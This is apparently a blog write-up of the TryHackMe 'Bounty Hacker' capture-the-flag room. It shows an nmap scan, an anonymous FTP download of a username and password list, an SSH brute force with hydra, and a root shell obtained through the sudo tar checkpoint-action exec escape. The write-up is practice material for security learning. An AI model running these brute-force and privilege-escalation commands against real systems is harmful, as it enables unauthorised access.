1.Introduction

Welcome back guys, Today we will take a new room from tryhackme called Bounty-Hunter This is a linux machine machine which is simply beginner friendly for beginners. This room only contains 1 TASK with 7 questions.

Our objective is to find the user password and capture all the flags one machine

2. Enumeration

As always Enumeration is our main key. So Lets Scan this with our NMAP

sudo nmap -sC -sV -T4 10.10.205.103

 ─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter]
 └╼ [★]$ sudo nmap -sC -sV -T4 -oA initial.nmap 10.10.205.103
 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 23:27 IST
 Nmap scan report for 10.10.205.103
 Host is up (0.35s latency).
 Not shown: 967 filtered ports, 30 closed ports
 PORT   STATE SERVICE VERSION
 21 /tcp open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | -rw-rw-r--    1 ftp      ftp           418 Jun 07 21:41 locks.txt
 |_-rw-rw-r--    1 ftp      ftp            68 Jun 07 21:47 task.txt
 | ftp-syst: 
 |   STAT: 
 | FTP server status:
 |      Connected to ::ffff:10.9.70.156
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 4
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22 /tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
 |   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
 |_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
 80 /tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
 |_http-server-header: Apache/2.4.18 (Ubuntu)
 |_http-title: Site doesn t have a title (text/html).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Here 3 ports are open.

21 : FTP

22 : SSH

80 : HTTP

From nmap result we can identify that this server allows </strong>annonymous FTP login</strong> So let check the FTP server of this machine.

ftp 10.10.205.103

─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter] └──╼ [★]$ ftp 10.10.205.103 Connected to 10.10.205.103. 220 (vsFTPd 3.0.3) Name (10.10.205.103:zen-prime): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-rw-r– 1 ftp ftp 418 Jun 07 21:41 locks.txt -rw-rw-r– 1 ftp ftp 68 Jun 07 21:47 task.txt 226 Directory send OK. ftp>

Yeah ! we logged to the FTP sucessfully.on the ftp server we can see that there are Two files are present -task.txt , -locks.txt

From this the task.txt gives us the answer for the #3 Question of our task and it’s a Username on that machine.

Lin

The second one -locks.txt is an password list which will help to bruteforce it.

3.Bruteforce

From Nmap we see another service is running on port 22 of this machine which is SSH so lets bruteforce this service with our password list lock.txt for the username Lin using hydra.

hydra -l lin -P locks.txt -t 15 ssh://10.10.205.103

─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter] └──╼ [★]$hydra -l lin -P locks.txt -t 15 ssh://10.10.205.103 Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations,or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-14 00:18:59 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 15 tasks per 1 server, overall 15 tasks, 26 login tries (l:1/p:26), ~2 tries per task [DATA] attacking ssh://10.10.205.103:22/ [22][ssh] host: 10.10.205.103 login: lin password: R******3 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 1 final worker threads did not complete until end. [ERROR] 1 target did not resolve or could not be connected [ERROR] 0 targets did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-14 00:19:08

 [DATA] attacking ssh://10.10.205.103:22/

 [22][ssh] host: 10.10.205.103   login: lin   password: R****************3

Hydra did its work perfectly it gives us the password for the ssh of this machine. so we got the answer for our #5 question of the task.

so lets jump for ssh connection to this machine.

4.SSH Connection

So we go the username and password now lets login

ssh lin@10.10.205.103

─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter] └──╼ [★]$ ssh lin@10.10.205.103 The authenticity of host ‘10.10.205.103 (10.10.205.103)’ can’t be established. ECDSA key fingerprint is SHA256:fzjl1gnXyEZI9px29GF/tJr+u8o9i88XXfjggSbAgbE. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added ‘10.10.205.103’ (ECDSA) to the list of known hosts. lin@10.10.205.103’s password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)

• Documentation: https://help.ubuntu.com
• Management: https://landscape.canonical.com
• Support: https://ubuntu.com/advantage

83 packages can be updated. 0 updates are security updates.

Last login: Sun Jun 7 22:23:41 2020 from 192.168.0.14 lin@bountyhacker:~/Desktop$ whoami lin

so we got access to the machine.now lets check for our flags.first we will check of our userflag

ls -l

lin@bountyhacker:~/Desktop$ ls -l total 4 -rw-rw-r– 1 lin lin 21 Jun 7 17:06 user.txt lin@bountyhacker:~/Desktop$ cat user.txt THM{C**_***}

USER FLAG

THM{C_***}

Now the Question #6 is completed

5. Privilage Escalation

so we got our user flag of this machine. now lets check for how to get our root flag of this machine.

First Lets check what commands run as sudo for our user Lin on this machine

it can be checked with the command

sudo -l

lin@bountyhacker:~/Desktop$ sudo -l [sudo] password for lin: Matching Defaults entries for lin on bountyhacker: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin: /usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User lin may run the following commands on bountyhacker: (root) /bin/tar

Our user lin can run tar with root permission without wasteing our time lets quick jump to GTFOBins which contains things that can used for escalation

Lets search for tar

from GTFOBins we get that tar can also be used for escalation.

sudo tar -cf /dev/null /dev/null –checkpoint=1 –checkpoint-action=exec=/bin/sh

lin@bountyhacker:~/Desktop$ whoami lin lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null –checkpoint=1 –checkpoint-action=exec=/bin/sh tar: Removing leading / from member names

whoami

root

id

uid=0(root) gid=0(root) groups=0(root) #

Now we obtained the root access. Now Let check our root flag for what inside it

cat /root/root.txt

# cat /root/root.txt  
THM{8*****_******}

Root Flag

THM{8_***}

Our Last Question #7 for this task is now Completed.

6 .Conclusion

Yeah The Machine was realy cool and helpfull for learning..

Thanks .